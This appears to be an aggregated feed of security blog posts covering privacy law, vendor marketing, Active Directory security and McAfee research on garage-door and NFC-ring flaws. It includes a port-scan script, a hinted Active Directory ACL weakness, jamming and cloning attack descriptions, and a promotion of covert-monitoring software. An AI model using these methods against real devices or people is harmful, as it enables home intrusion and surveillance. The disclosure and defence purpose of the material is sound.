  • Are equipped to cover third-party vendors used by the organization

Taking steps towards a well-rounded security program not only bolsters your defense against attacks but also sheds light on wrinkles in your remediation process that need ironing. With these measures in place, if a breach or a cyberattack occurs, your healthcare organization will be better equipped to handle issues with minimal to no impact on patient care.

Learn more about cybersecurity in healthcare

Like what you see? Find more info about the state of cybersecurity for healthcare by downloading our SOSS Volume 10 Industry Snapshot, and then check out the full report to keep a pulse on the shifts in DevSecOps over the last ten years.


For privacy, 2020 is not for hindsight

It has been an exciting few years for privacy. The passing and enforcement of new laws (such as CCPA and GDPR) and modifications made to others have caused a flurry of activity across organizations of all sizes. Decisions have been made about how to meet the laws’ requirements by changing procedures and policies. Now it is […]

The post For privacy, 2020 is not for hindsight appeared first on Privacy Ref.

CCPA and University Surveillance Apps

It’s the turn of a new decade and a new privacy law has gone into effect — the California Consumer Privacy Act, or CCPA. A quick check with some of my fellow privacy pros on how many consumer information requests were received by the end of the day on Jan. 1 puts retail at higher numbers […]

The post CCPA and University Surveillance Apps appeared first on Privacy Ref.

Who Needs WMDs (Weapons of Mass Destruction) Today ?

Folks,

Today, yet again, I'd like to share with you a simple Trillion $ question, one that I had originally asked more than 10 years ago, and asked again just about two years ago. Today it continues to be exponentially more relevant to the whole world.

In fact, it is more relevant today than ever given the paramount role that cyber security plays in business and national security.


So without further ado, here it is - Who needs WMDs (Weapons of Mass Destruction) Today?


Ans: Only those who don't know that we live in a digital world, one wherein virtually everything runs on (networked) computers.


Why would an entity bother trying to acquire or use a WMD (or for that matter even a conventional weapon) when (if you're smart) you could metaphorically stop the motor of entire organizations (or nations) with just a few lines of code designed to exploit arcane but highly potent misconfigured security settings (ACLs) in the underlying systems on which governments, militaries and thousands of business organizations of the world operate?

Today, all you need is two WDs in the same (pl)ACE and it's Game Over.


Puzzled? Allow me to give you a HINT:

Here’s a simple question: What does the following non-default string represent and why should it be a great cause of concern?
(A;;RP;;;WD)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(A;;RPLCLORC;;;AU)(A;;RPWPCRLCLOCCRCWDWOSW;;;DA)(A;CI;RPWPCRLCLOCCRCWDWOSDSW;;;BA)(A;;RPWPCRLCLOCCDCRCWDWOSDDTSW;;;SY)(A;CI;RPWPCRLCLOCCDCRCWDWOSDDTSW;;;EA)(A;CI;LC;;;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU) (A;CI;RPWDLCLO;;;WD)(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;RU) (OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RPLCLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(A;;RC;;;RU)(OA;CIIO;RPLCLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)

Today, this one little question and the technicality I have shared above directly impacts the cyber security of the entire world.


If you read my words very carefully, as you always should, then you'll find that it shouldn't take an astute cyber security professional more than a minute to figure it out, given that I’ve actually already provided the answer above.


Today, the CISO of every organization in the world, whether it be a government, a military or a billion dollar company (of which there are a dime a dozen, and in fact thousands worldwide) or a trillion dollar company MUST know the answer to this question.


They must know the answer because it directly impacts and threatens the foundational cyber security of their organizations.

If they don't, (in my opinion) they likely shouldn't be the organization's CISO because what I have shared above could possibly be the single biggest threat to 85% of organizations worldwide, and it could be used to completely compromise them within minutes (and any organization that would like a demo in their real-world environment may feel free to request one.)

Some of you will have figured it out. For the others, I'll finally shed light on the answer soon.

Best wishes,
Sanjay


PS: If you need to know right away, perhaps you should give your Microsoft contact a call and ask them. If they too need some help (they likely will ;-)), tell them it has to do with a certain security descriptor in Active Directory. (There, now that's a HINT the size of a domain, and it could get an intruder who's been able to breach an organization's network perimeter to root in seconds.)

PS2: If this intrigues you, and you wish to learn more, you may want to read this - Hello World :-)

Viva Las Vegas: Cash Out with the #McAfeeAtCES RT2Win Sweepstakes!

We’ve officially touched down in Las Vegas for CES 2020!

If you aren’t familiar with CES, it is the global stage for innovators to showcase the next generation of consumer technologies, including IoT devices. Though these devices are convenient, they can also raise security concerns due to overlooked weaknesses. Check out the latest research from the McAfee Advanced Threat Research (ATR) team on device vulnerabilities for more information.

With the growing consumer technology landscape, we here at McAfee understand the importance of creating new solutions for those who want to live their connected lives with confidence.

In fact, to celebrate the latest innovations, we’re giving three [3] lucky people the chance to win an Amazon gift card. Not heading to CES this year? No problem! Simply retweet one of our contest tweets with the required hashtag between January 7th – 9th for your chance to win. Follow the instructions below to enter, and good luck!


#RT2Win Sweepstakes Official Rules

  • To enter, go to https://twitter.com/McAfee_Home, and find the #RT2Win sweepstakes tweet.
  • Three [3] sweepstakes tweets will be released on the following schedule, each including the hashtags #RT2Win, #Sweepstakes AND #McAfeeAtCES:
    • Tuesday, January 7, 2020 at 7:00AM PST
    • Wednesday, January 8, 2020 at 7:00AM PST
    • Thursday, January 9, 2020 at 7:00AM PST
  • Retweet the sweepstakes tweet released on the above date before 11:59PM PST, from your own handle. The #RT2Win, #Sweepstakes AND #McAfeeAtCES hashtags must be included to be entered.
  • Sweepstakes will end on Thursday, January 9, 2020 at 11:59pm PT. All entries must be made before that date and time.
  • Winners will be notified by 10:00AM PT the following day via Twitter direct message.
  • Limit one entry per person.
1. How to Win:

Retweet one of our contest tweets on @McAfee_Home that include “#RT2Win, #Sweepstakes, and #McAfeeAtCES” for a chance at an Amazon Gift card. Winners must be following @McAfee_Home for eligibility. One [1] winner will be selected per day, and notified by 10:00AM PT the following day, for a total of three [3] winners. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.

#McAfeeAtCES RT2Win CES Sweepstakes Terms and Conditions

2. How to Enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee’s #RT2Win CES Sweepstakes will be conducted from January 7th through January 9th. All entries for each day of the #McAfeeAtCES RT2Win CES Sweepstakes must be received during the time allotted for the #RT2Win CES Sweepstakes. Pacific Daylight Time shall control the McAfee RT2Win CES Sweepstakes. The #McAfeeAtCES RT2Win Sweepstakes duration is as follows:

  • Begins: Tuesday, January 7, 2020 at 7:00am PST
  • Ends: Thursday, January 9, 2020 at 11:59pm PST
    • Opportunity 1: Tuesday, January 7, 2020 at 7:00AM PST
    • Opportunity 2: Wednesday, January 8, 2020 at 7:00AM PST
    • Opportunity 3: Thursday, January 9, 2020 at 7:00AM PST
  • Winners will be announced: by 10:00AM PST the following day

For the #McAfeeAtCES RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the #McAfeeAtCES RT2Win Sweepstakes:

  1. Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #McAfeeAtCES, #RT2Win and #Sweepstakes.
  2. Retweet the sweepstakes tweet of the day and make sure it includes the #McAfeeAtCES, #RT2Win and #Sweepstakes hashtags.
    1. Note: Tweets that do not contain the #McAfeeAtCES, #RT2Win and #Sweepstakes hashtags will not be considered for entry.
  3. Limit one entry per person.

Three [3] winners will be chosen for the #McAfeeAtCES RT2Win CES Sweepstakes tweet from the viable pool of entries that retweeted and included the #McAfeeAtCES, #RT2Win and #Sweepstakes hashtags. McAfee and the McAfee social team will select winners at random from among the viable entries. The winners will be announced and privately messaged on January 10th on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes. SWEEPSTAKES IS IN NO WAY SPONSORED, ENDORSED, ADMINISTERED BY, OR ASSOCIATED WITH TWITTER, INC.

3. Eligibility: 

McAfee’s #RT2Win CES Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the dates of the #McAfeeAtCES RT2Win CES Sweepstakes begins and live in a jurisdiction where this prize and #McAfeeAtCES RT2Win CES Sweepstakes are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

4. Winner Selection:

Winners will be selected from the eligible entries received during the days of the #McAfeeAtCES RT2Win CES Sweepstakes periods. Sponsor will select the names of three [3] potential winners of the prizes in a random drawing from among all eligible submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official #McAfeeAtCES RT2Win CES Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

5. Winner Notification: 

Each winner will be notified via direct message (“DM”) on Twitter.com by January 10, 2020. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or the prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if a potential winner cannot be reached within twenty-four (24) hours from the first DM notification attempt, if a potential winner fails to return the requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

6. Prizes: 

The prizes for the #McAfeeAtCES RT2Win CES Sweepstakes are two [2] $100 Amazon e-gift cards and a one [1] $200 Amazon e-gift card (approximate retail value “ARV” of the prize is $100 and $200 USD; the total ARV of all gift cards is $400 USD). Entrants agree that Sponsor has the sole right to determine the winners of the #McAfeeAtCES RT2Win CES Sweepstakes and all matters or disputes arising from the #McAfeeAtCES RT2Win CES Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

7. General Conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the #McAfeeAtCES RT2Win CES Sweepstakes, or by any technical or human error, which may occur in the processing of the #McAfeeAtCES RT2Win CES Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the #McAfeeAtCES RT2Win CES Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any #McAfeeAtCES RT2Win CES Sweepstakes -related activity, or participation in the #McAfeeAtCES RT2Win CES Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

If participating in this Sweepstakes via your mobile device (which service may only be available via select devices and participating wireless carriers and is not required to enter), you may be charged for standard data use from your mobile device according to the terms in your wireless service provider’s data plan.  Normal airtime and carrier charges and other charges may apply to data use and will be billed on your wireless device bill or deducted from your pre-paid balance.  Wireless carrier rates vary, so you should contact your wireless carrier for information on your specific data plan.

8. Limitations of Liability; Releases:

By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  1. To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.
  2. Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list). As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

 9. Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize #McAfeeAtCES RT2Win CES Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each #McAfeeAtCES RT2Win CES Sweepstakes.

10. Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the #McAfeeAtCES RT2Win CES Sweepstakes and all matters or disputes arising from the #McAfeeAtCES RT2Win CES Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

11. Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with this sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of New York.

12. Privacy Policy: 

Personal information obtained in connection with this #RT2Win CES Sweepstakes will be handled in accordance with the privacy policy set forth at https://www.mcafee.com/enterprise/en-us/about/legal/privacy.html

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after January 10th 2020 and before January 10th 2021 to the address listed below, Attn: #RT2Win at CES Sweepstakes. To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed below, Attn: Sarah Grayson. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2018 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA
  4. Administrator: LEWIS, 111 Sutter St., Suite 850, San Francisco, CA 94104

The post Viva Las Vegas: Cash Out with the #McAfeeAtCES RT2Win Sweepstakes! appeared first on McAfee Blogs.

Veracode CEO Sam King Recognized in WomenInc. Magazine’s 2019 Top Influential Corporate Directors

We're thrilled to announce that Veracode Chief Executive Officer Sam King has been named one of WomenInc. Magazine's 2019 Most Influential Corporate Directors!

Honoring influencers, achievers, and executives, this announcement recognizes women who are making notable contributions to the world of business and technology. The list compiled by WomenInc. Magazine includes over 700 directors serving on the boards of S&P 1000/Mid-Cap publicly held companies.

To celebrate these accomplished leaders, WomenInc. maintains an exclusive online directory of honorees and publishes their yearly announcement in seasonal editions of the magazine.

King is recognized for her contributions on behalf of Progress Software, the leading provider of application development and digital experience technologies. Since joining the Board of Directors in February 2018, she has contributed to the implementation of Progress' business strategy as well as its charter to operate as a socially responsible organization.

She is also a well-known expert in cybersecurity and is a founding member of the Veracode team. She helped lead the establishment and evolution of the application security category alongside industry experts and analysts. Veracode is the largest independent application security provider worldwide, valued at $1 billion.

"It is essential that the achievements and success of professional women are showcased in the highest regard and their stories are told in meaningful ways," said Catrina Young, the Executive Vice President and Chief Communications Officer of WomenInc. "We are proud that we can recognize this distinguished group of women and we are inspired by their accomplishments, their distinguished careers and the corporations that demonstrate an inclusive board composition. We offer our congratulations."

Encouraging positive dialogue from influential female voices in leadership, WomenInc. Magazine is a media platform dedicated to fostering the ideas, events, social commentary, and stories that inspire professional women.

To see the full list of honorees, visit the directory here or grab a copy of WomenInc.'s winter issue from your local newsstand.

Security at DevOps Speed: How Veracode Reduces False Positives

Originally Published on November 27, 2017 -- Updated on January 7, 2020

Application security solutions that slow or stall the development process simply aren't feasible in a DevOps world. AppSec will increasingly need to fit as seamlessly as possible into developer processes, or it will be under-used or overlooked. But overlooking AppSec puts your organization at high risk of a damaging breach. Our most recent State of Software Security report found that a whopping 83 percent of apps had at least one vulnerability on initial scan. Leaving your code vulnerable leaves your organization open to breach. In the end, you need AppSec, but you also need AppSec that developers will use. Reduction of false positives is a big part of this requirement. False positives are always a key concern because they make developers and security folks spin their wheels, so solutions should minimize them as much as possible.

How Veracode Works to Reduce False Positives

We aim for full automation and high speeds for all of our scans, but that doesn't mean that we compromise on quality. Unique to our position as a SaaS provider, our security research team regularly samples customer app submissions to manually review flaws. This ensures that we have met our standards for accuracy in terms of both false positives and negatives. By reviewing actual customer apps, we get a much broader and realistic set of cases than would be possible in a QA lab that only tests applications built as internal test cases.

Our review of these applications leads to improvements that are implemented back into our static analysis engine.

The SaaS Advantage

As a native SaaS provider, Veracode has a strategic advantage in improving false-positive rates. To date, we've assessed over 13.5 trillion lines of code and performed more than 4 million scans, and with every release, our solution gets smarter. On-premises solutions, on the other hand, require their customers to manually create custom rules to adjust for false positives in their vendor's software, which can be very time consuming and complicated, or to wait for their on-premises vendor to release a new revision to the scanner, which requires downtime and unplanned work for the security teams. We at Veracode improve our static analysis engine at least monthly, and improvements we have made by observing the behavior of all customer applications are available with minimal disruption to your processes.

The result for our customers is that they get very high quality at high speeds (89 percent of our scans finish in less than an hour), without having to train and maintain a team for customizing scan rules to avoid false positives. This rule customization can be costly and time consuming, and requires a skill set that is hard to come by. In addition, customizations can be challenging to maintain if the person who wrote the code leaves the company. Finally, rule customization can muddy results for attestations: it's hard to prove to third parties that your apps are secure if anyone can rig the results by manipulating rules.

On the other hand, our false-positive rate is a low 1.1 percent, with zero rule customization. This 1.1 percent false-positive rate across real-world applications is verified and based on feedback from our customers on vulnerabilities they have reviewed. By comparison, our competitors claim a 32 percent false-positive rate.

Bottom Line

The Veracode solution has scanned hundreds of thousands of enterprise, mobile and cloud-based apps, and we've helped our customers fix more than 48 million flaws. Bottom line? Better analytics, faster improvements, increased accuracy and the ability to create more software, more securely than ever before.

Find out more about the Veracode Application Security solution.

Cybercrime is moving towards smartphones – this is what you could do to protect your company

By 2021, cybercrimes will cost companies USD 6 trillion, according to a study.

The number of internet users has grown from an estimated 2 billion in 2015 to 4.4 billion in 2019, but so has cybercrime, which is expected to cost companies USD 6 trillion worldwide, according to a study by Cybersecurity Ventures.

Similarly, the number of smartphone users has grown from 2.5 billion in 2016 to 3.2 billion in 2019 and is forecasted to grow to 3.8 billion by 2021. Smartphones and the internet will make further inroads to our economic system. But there are certain risks involved as well.

Mobile phones are becoming targets of cybercriminals because of their widespread use and increasing computing power. Consider the fact that more than 60% of online fraud occurs through mobile phones. This threat is aimed not just at individual users but at businesses as well, and it does not matter how large the company is: 43% of the cyberattacks in 2019 were aimed at smaller businesses because they do not have adequate protection.

Given how vulnerable smartphones are and that the threat from cyber attacks is only expected to increase, here are some measures you can take to protect your business from cybercriminals:

Rethink BYOD:

Bring Your Own Device (BYOD) offers several benefits to both the organization and employees. Such a policy allows employees at a company to use their own mobile phones, tablets, or laptops for work, saving companies the hassle of purchasing devices.

However, you need to rethink if you are saving more than what you are losing. Employees have confidential company information on their devices. Such a door into your organization can cost you heavily. Set aside the funds to obtain company devices for use by employees at the office. Consider such an investment as part of your cybersecurity strategy.

 

Cybersecurity assessments:

The cybersecurity threat landscape is ever-evolving due to the fast nature of innovation. Develop a comprehensive cybersecurity program that includes a regular assessment of your company’s security needs. Identify the strengths of your IT infrastructure against potential attacks, and do not let advances in technology or techniques take that away from you. Similarly, you should identify the vulnerabilities in your systems. Make sure any gaps in your defenses are appropriately plugged. A threat assessment should be an integral component of any cybersecurity policy.

Retrain staff:

Make sure that employees at your organization are informed and up to date on the latest in cyber threats. This way they can protect themselves and the company from cybercriminals. Even a single mistake by one employee can end up creating a door for individuals or groups wishing your company harm. All employees must be trained as a matter of policy. This way, they can identify phishing attacks and manage social engineering scams. Another factor your employees must be mindful of is resource monitoring. Suspicious resource use on company devices, whether it is excess internet or battery usage, should raise alarm bells. However, employees may not look into such things in detail because they do not own the devices. Train your staff to keep track of resource use too.

 

Employee monitoring:

Most organizations have some form of an employee monitoring policy and track their workers. If you haven’t done so already, develop such a policy, and keep your employees informed to ensure transparency. If you have decided to use company devices, you can opt to install monitoring apps on them. There are several modern monitoring apps currently available, such as XNSPY. The app can keep track of online activities, generate a list of call logs, and remotely control the device. Furthermore, you can track the location of the device in real time and use features such as geofencing and GPS history. There are other powerful features too, such as ambient recording, multimedia access, and online activity tracking. You can also wipe all the data from a device in case of theft. Monitoring apps such as XNSPY should be a part of your strategy against cybercriminals.

 

Don’t forget physical infrastructure:

Cybersecurity may involve software updates and training policies, but making sure your physical infrastructure is safe is just as important. Re-evaluate how exposed your digital infrastructure is to physical access. Furthermore, go through the profiles of suppliers and vendors to vet them properly. A small door in any piece of equipment can let cybercriminals through and bypass your entire cybersecurity foundation. Be aware of this threat and make sure that suppliers work by following specific regulations.

Develop a threat monitoring policy:

Anticipating an attack and stopping it is an important part of comprehensive cybersecurity policy. Make sure that you are monitoring your digital infrastructure round the clock.

Invest in threat monitoring software and a team of professionals that can identify, track, and stop an attack.

The concept of designing a cybersecurity system as a fortification is changing to an adaptable system that can accommodate evolving security threats. Furthermore, a monitoring policy also needs to have a clear response plan.

Such a plan details what needs to happen and when in case of an attack. This ensures that there is a speedy response by your company against any threat.

 Conclusion:

Smartphones have become powerful enough that they can be considered as computers in their own right. While this has created scores of opportunities, there are also clear threats posed by cybercrime. These threats are only going to increase as the internet and smartphone use increases. While protecting your business against cyber criminals requires a considerable investment of time and money, it will pay off in the long run.

 

Clark Thomas is an expert in VoIP. He helps businesses, both small and medium-sized, in implementing and adopting the best security methods for their organization and network. He gives great advice and assists people in boosting the security measures for their website and business.

The post Cybercrime is moving towards smartphones – this is what you could do to protect your company appeared first on CyberDB.

What is Active Directory? (Cyber Security 101 for the Entire World)

Folks,

Today is January 06, 2020, and as promised, here I am getting back to sharing perspectives on cyber security.


Cyber Security 101

Perhaps a good topic to kick off the year is to ask and answer a simple yet vital question - What is Active Directory?

You see, while this question may seem simple to some (and it is), it's one of the most important questions to answer adequately, because in an adequate answer to this most simple question lies the key to organizational cyber security worldwide.

The simple reason for this is that if you were to ask most CISOs or IT professionals, they'll likely tell you that Active Directory is the "phone book" of an organization's IT infrastructure. While it's true that, at its simplest, it is a directory of all organizational accounts and computers, it is this shallow view that leads organizations to greatly diminish the real value of Active Directory, to the point of sheer irresponsible cyber negligence, because "Who really cares about just a phone book?"

In fact, for two decades now, this has been the predominant view held by most CISOs and IT personnel worldwide, and sadly it is the negligence resulting from such a simplistic view of Active Directory that is likely the reason the Active Directory deployments of most organizations remain substantially insecure and vastly vulnerable to compromise today.

Again, after all, who cares about a phone book?!




Active Directory - The Very Foundation of Organizational Cyber Security Worldwide

If, as they say, "A Picture is Worth a Thousand Words," perhaps I should paint you a very simple trillion-dollar picture -


An organization's Active Directory deployment is its single most valuable IT and corporate asset, worthy of the highest protection at all times, because it is the very foundation of an organization's cyber security.

The very building blocks of an organization's cyber security, i.e. all the organizational user accounts and passwords used to authenticate its people, all the security groups used to aggregate and authorize access to its IT resources, all its privileged user accounts, and the accounts of all its computers, including all laptops, desktops and servers, are stored, managed and secured in (i.e. inside) the organization's foundational Active Directory, and all actions on them are audited in it.

In other words, should an organization's foundational Active Directory, or a single Active Directory privileged user account, be compromised, the entirety of the organization could be exposed to the  risk of complete, swift and colossal compromise.



Active Directory Security Must Be Organizational Cyber Security Priority #1

Today, ensuring the highest protection of an organization's foundational Active Directory deployment must undoubtedly be the #1 priority of every organization that cares about cyber security, protecting shareholder value and business continuity.


Here's why - A deeper, detailed look into What is Active Directory?


For anyone to whom this may still not be clear, I'll spell it out - just about everything in organizational Cyber Security, whether it be Identity and Access Management, Privileged Access Management, Network Security, Endpoint Security, Data Security, Intrusion Detection, Cloud Security, Zero Trust etc. ultimately relies and depends on Active Directory (and its security).



In essence, today every organization in the world is only as secure as is its foundational Active Directory deployment, and from the CEO to the CISO to an organization's shareholders, employees and customers, everyone should know this cardinal fact.

Best wishes,
Sanjay.

What You Need to Know About the Latest IoT Device Flaws

The McAfee Advanced Threat Research (ATR) team recently uncovered a security flaw in a popular connected garage door opener and a security design issue in an NFC (near field communication, a technology that allows nearby devices to communicate with each other) smart ring used to unlock doors. As we head into CES 2020, the global stage where innovators showcase the next generation of consumer technologies, let’s take a look at these new security flaws and discover how users can connect securely and with confidence.

Review Chamberlain IoT device

The McAfee ATR team recently investigated the Chamberlain MyQ Hub, a “universal” garage door automation platform. The Hub acts as a new garage door opener, similar to the one that you would have in your car. However, the McAfee ATR team discovered an inherent flaw in the way the MyQ Hub communicates over radio frequency signals. It turns out that hackers can “jam” the radio frequency signals while the garage is being remotely closed. How? By jamming or blocking the code signal from ever making it to the Hub receiver, the remote sensor will never respond with the closed signal. This delivers an error message to the user, prompting them to attempt to close the door again through the app, which actually causes the garage door to open.

How can the Chamberlain IoT device be hacked?

Let’s break it down:

  • Many users enjoy using the MyQ Hub for the convenience of package delivery, ensuring that their packages are safe from porch pirates and placed directly in the garage by the carrier.
  • However, an attacker could wait for a package delivery using the connected garage door opener. The hacker could then jam the MyQ signal once the carrier opens the door and prompt an error message for the user. If and when the user attempts to close the door, the door will open and grant the attacker access to the home.
  • An attacker could also wait and see when a homeowner physically leaves the premises to jam the MyQ signal and prompt the error message. This would potentially allow further access into the home.

Review McLear NFC Ring IoT device

The McAfee ATR team also discovered an insecure design with the McLear NFC Ring, a household access control device that can be used to interact with NFC-enabled door locks. Once the NFC Ring has been paired with an NFC-enabled door lock, the user can access their house by simply placing the NFC Ring within the NFC range of the door lock instead of using a traditional house key. However, due to an insecure design, hackers could easily clone the ring and gain access to a user’s home.

How can the McLear NFC Ring be hacked?

  • First, the attacker can do some basic research on the victim, such as finding a social media post about how excited they are to use their new McLear NFC Ring.
  • Now, say the attacker locates the victim in a public setting and asks them to take a picture of them on the attacker’s phone. The attacker’s phone, equipped with an app to read NFC tags, can record the relevant information without giving any signs of foul play.
  • The McLear NFC Ring is now compromised, and the information can be programmed on a standard writable card, which can be used to unlock smart home locks that partner with the product.

How to keep your IoT devices safe from hacking

In the era of IoT devices, the balance between cybersecurity and convenience is an important factor to get right. According to Steve Povolny, head of McAfee Advanced Threat Research, “the numerous benefits technology enhancements bring us are exciting and often highly valuable; but many people are unaware of the lengths hackers will go and the many ways new features can impact the security of a system.” To help safeguard your security while still enjoying the benefits of your connected devices, check out the following tips:

  • Practice proper online security habits. Fortunately, users have many tools at their disposal, even when cybersecurity concerns do manifest. Implement a strong password policy, put IoT devices on their own, separate network, utilize dual-factor authentication when possible, minimize redundant systems, and patch quickly when issues are found.
  • Do your research. Before purchasing a new IoT device, take the time to look into its security features. Users should ensure they are aware of the security risks associated with IoT products available on the market.

Stay up to date

To stay on top of McAfee’s CES news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What You Need to Know About the Latest IoT Device Flaws appeared first on McAfee Blogs.

We Be Jammin’ – Bypassing Chamberlain myQ Garage Doors

The idea of controlling your garage door remotely and verifying that everything is secure at home, or having packages delivered directly into your garage, is enticing for many people. The convenience that many of these IoT devices provide often steers consumers away from thinking about the possible security concerns.

McAfee Advanced Threat Research recently investigated Chamberlain’s MyQ Hub, a “Universal” garage door automation platform. The way Chamberlain has made this device universal is via a Hub, which acts as a new garage door opener, similar to the one that you would have in your car. This allows the MyQ Hub to retrofit and work with a wide variety of garage doors.

We found that Chamberlain did a fairly good job of securing this device, a level of care that is still uncommon for IoT devices. However, we discovered that there is a flaw in the way the MyQ Hub communicates with the remote sensor over radio frequencies.

From an attack perspective there are three main vectors that we began to look at: local network, remote access (API, or third-party integration), and RF communications between the sensor and the Hub. The first thing we attempted was to gain access to the device via the local network. A quick port scan of the device revealed that it was listening on port 80. When attempting to navigate to the device at port 80 it would redirect to start.html and return a 404 error. No other ports were open on the device.
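
A check along these lines can be reproduced with a few lines of Python; the sketch below is illustrative only, and the hub address and port list are assumptions rather than values taken from the research.

    # Minimal TCP connect scan and web-root check; the hub address and port
    # list are illustrative assumptions, not values from the research.
    import socket
    import urllib.error
    import urllib.request

    HUB = "192.168.1.50"                 # placeholder: substitute the MyQ Hub's LAN address
    PORTS = [22, 23, 80, 443, 8080, 8443]

    for port in PORTS:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(1.0)
        result = s.connect_ex((HUB, port))      # 0 means the port accepted the connection
        s.close()
        print(f"port {port}: {'open' if result == 0 else 'closed/filtered'}")

    # Fetch the web root to observe the redirect/404 behavior described above.
    try:
        with urllib.request.urlopen(f"http://{HUB}/", timeout=2) as resp:
            print(resp.status, resp.geturl())
    except urllib.error.HTTPError as err:       # a 404 surfaces here
        print(err.code, err.geturl())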

The inside of the Chamberlain MyQ Hub

Disassembling the Hub revealed a small SOC (system on a chip) module that was handling the Wi-Fi and web communications and a secondary PIC microcontroller which was responsible for controlling the RF side of things for both the garage door and the remote door sensor. The MyQ Hub listed on FCC’s website also included a Bluetooth module that was not present on the two MyQ Hubs that we purchased.

